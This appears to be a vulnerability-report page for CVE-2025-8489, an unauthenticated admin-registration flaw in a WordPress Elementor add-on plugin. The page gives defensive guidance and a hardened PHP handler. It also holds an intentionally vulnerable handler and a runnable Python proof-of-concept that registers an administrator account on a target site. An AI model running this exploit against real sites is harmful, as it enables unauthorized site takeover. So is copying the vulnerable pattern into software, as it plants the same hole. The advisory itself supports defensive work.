Security Vulnerability Report
CVE-2025-8489 CVSS 9.8 CRITICAL

Published: 2025-10-31 07:15:39
Last Modified: 2026-04-15 00:35:42

Description

The King Addons for Elementor – Free Elements, Widgets, Templates, and Features for Elementor plugin for WordPress is vulnerable to privilege escalation in versions 24.12.92 to 51.1.14. The plugin's registration handler does not restrict the roles a new user can register with (CWE-269, Improper Privilege Management). An unauthenticated attacker can therefore submit a registration request that names the administrator role and obtain an administrator-level account, which on WordPress amounts to full control of the site (plugin installation, arbitrary PHP execution, data access).
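The pattern the description refers to, shown as an added example that is not King Addons code: a WordPress AJAX registration handler that copies a client-supplied role into wp_insert_user(), beside a hardened handler that ignores the request's role, takes it from a site-controlled option, and still filters that value through an allowlist. Every name prefixed hypo_ (functions, the AJAX action, the nonce action, option names) is an assumption made for this example; the request field names mirror the PoC on this page and are not confirmed plugin identifiers.

```php
<?php
/**
 * Added example (not King Addons code). Illustrates the CWE-269 pattern
 * behind CVE-2025-8489 in a WordPress AJAX registration handler and a
 * hardened version. All "hypo_" names are assumptions for this example.
 */

// --- VULNERABLE PATTERN: the role is whatever the client sent -----------------
function hypo_register_user_vulnerable() {
    $login = sanitize_user( wp_unslash( $_POST['username'] ?? '' ), true );
    $email = sanitize_email( wp_unslash( $_POST['email'] ?? '' ) );
    $pass  = (string) wp_unslash( $_POST['password'] ?? '' );
    // An unauthenticated caller can send role=administrator here.
    $role  = sanitize_key( wp_unslash( $_POST['role'] ?? get_option( 'default_role' ) ) );

    $user_id = wp_insert_user( array(
        'user_login' => $login,
        'user_email' => $email,
        'user_pass'  => $pass,
        'role'       => $role,   // trusted straight from the request
    ) );
    if ( is_wp_error( $user_id ) ) {
        wp_send_json_error( array( 'message' => $user_id->get_error_message() ) );
    }
    wp_send_json_success( array( 'user_id' => $user_id ) );
}

// --- HARDENED: role decided server-side, privileged roles never assignable ----
function hypo_allowed_registration_role( $candidate ) {
    $candidate = sanitize_key( $candidate );
    // Roles that self-registration must never hand out, even if a site option
    // or widget setting names them (a misconfigured default_role included).
    $never = array( 'administrator', 'editor', 'author', 'contributor' );
    if ( ! wp_roles()->is_role( $candidate ) || in_array( $candidate, $never, true ) ) {
        return 'subscriber';
    }
    return $candidate;
}

function hypo_register_user_hardened() {
    // Dies with HTTP 403 when the nonce is missing or stale.
    check_ajax_referer( 'hypo_register', 'hypo_nonce' );

    if ( ! get_option( 'users_can_register' ) ) {
        wp_send_json_error( array( 'message' => 'Registration is closed.' ), 403 );
    }

    $login = sanitize_user( wp_unslash( $_POST['username'] ?? '' ), true );
    $email = sanitize_email( wp_unslash( $_POST['email'] ?? '' ) );
    $pass  = (string) wp_unslash( $_POST['password'] ?? '' );

    if ( '' === $login || ! is_email( $email ) || strlen( $pass ) < 12 ) {
        wp_send_json_error( array( 'message' => 'Invalid registration data.' ), 400 );
    }

    // The request's "role" field is ignored entirely. The role comes from a
    // site-controlled option and is still filtered through the allowlist.
    $role = hypo_allowed_registration_role(
        get_option( 'hypo_registration_role', get_option( 'default_role' ) )
    );

    $user_id = wp_insert_user( array(
        'user_login' => $login,
        'user_email' => $email,
        'user_pass'  => $pass,
        'role'       => $role,
    ) );

    if ( is_wp_error( $user_id ) ) {
        wp_send_json_error( array( 'message' => $user_id->get_error_message() ), 400 );
    }
    wp_send_json_success( array( 'user_id' => $user_id, 'role' => $role ) );
}

// Unauthenticated AJAX endpoint: exactly the surface the advisory describes.
add_action( 'wp_ajax_nopriv_hypo_register', 'hypo_register_user_hardened' );
```

Two caveats worth keeping in mind when reviewing a fix for this class of bug. A nonce check on its own does not close it: nonces for a wp_ajax_nopriv_ handler are minted for user 0 and embedded in the public page, so any visitor can obtain a valid one; the allowlist on the role is the actual control. And patching does not undo accounts an attacker already created, so after upgrading, list administrator accounts and their registration dates and remove any that nobody on the site recognizes.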

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No NVD configuration (CPE) data is available for this entry. The affected range below is taken from the description, which phrases it as "versions 24.12.92 to 51.1.14"; the second reference points at tag 51.1.35, which lies after that range.

King Addons for Elementor >= 24.12.92 and <= 51.1.14

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-8489 PoC - King Addons for Elementor Privilege Escalation
# Affected versions: 24.12.92 to 51.1.14
#
# NOTE: the AJAX action and field names below ('king_addons_register_user',
# 'username', 'role', 'king_addons_nonce') are this PoC's assumptions; confirm
# them against Login_Register_Form_Ajax.php in the referenced plugin tags
# before relying on the result.
import sys

import requests

# Target base URL; override on the command line: python poc.py https://example.org
TARGET_URL = sys.argv[1].rstrip("/") if len(sys.argv) > 1 else "https://target-site.com"


def exploit_privilege_escalation():
    """Exploit CVE-2025-8489 by registering an administrator account."""
    endpoint = f"{TARGET_URL}/wp-admin/admin-ajax.php"

    # Construct the malicious registration request.
    # The plugin fails to restrict the 'role' parameter, so the caller picks it.
    payload = {
        'action': 'king_addons_register_user',
        'username': 'hacked_admin',     # Attacker-controlled username
        'email': '[email protected]',   # Attacker-controlled email
        'password': 'P@ssw0rd123!',     # Attacker-controlled password
        'role': 'administrator',        # Privilege escalation: request the admin role
        'king_addons_nonce': '',        # May be bypassed or missing validation
    }

    try:
        print(f"[*] Sending exploitation request to {TARGET_URL}")
        response = requests.post(endpoint, data=payload, timeout=30)
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False

    if response.status_code != 200:
        print(f"[-] Server returned status code: {response.status_code}")
        return False

    is_json = 'json' in response.headers.get('content-type', '')
    result = response.json() if is_json else response.text
    print(f"[+] Response: {result}")

    # wp_send_json_success() and wp_send_json_error() both emit a "success"
    # key, so test its value instead of searching the body for the word.
    if isinstance(result, dict) and result.get('success') is True:
        print("[+] Administrator account created successfully!")
        print("[+] Login credentials:")
        print("    Username: hacked_admin")
        print("    Password: P@ssw0rd123!")
        print(f"[+] Access admin panel at: {TARGET_URL}/wp-admin/")
        return True

    print("[-] Exploitation may have failed, check response manually")
    return False


if __name__ == "__main__":
    exploit_privilege_escalation()

References

https://plugins.trac.wordpress.org/browser/king-addons/tags/24.12.93/includes/widgets/Login_Register_Form/Login_Register_Form_Ajax.php#L353 (plugin source at tag 24.12.93, inside the affected range)
https://plugins.trac.wordpress.org/browser/king-addons/tags/51.1.35/includes/widgets/Login_Register_Form/Login_Register_Form_Ajax.php#L160 (plugin source at tag 51.1.35, after the affected range)
https://www.wordfence.com/threat-intel/vulnerabilities/id/a1bb2b06-9a3b-4428-8624-26a1202fe3b0?source=cve (Wordfence advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-8489",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-31T07:15:38.693",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The King Addons for Elementor – Free Elements, Widgets, Templates, and Features for Elementor plugin for WordPress is vulnerable to privilege escalation in versions 24.12.92 to 51.1.14 . This is due to the plugin not properly restricting the roles that users can register with. This makes it possible for unauthenticated attackers to register with administrator-level user accounts."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-269"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/king-addons/tags/24.12.93/includes/widgets/Login_Register_Form/Login_Register_Form_Ajax.php#L353",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/king-addons/tags/51.1.35/includes/widgets/Login_Register_Form/Login_Register_Form_Ajax.php#L160",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a1bb2b06-9a3b-4428-8624-26a1202fe3b0?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}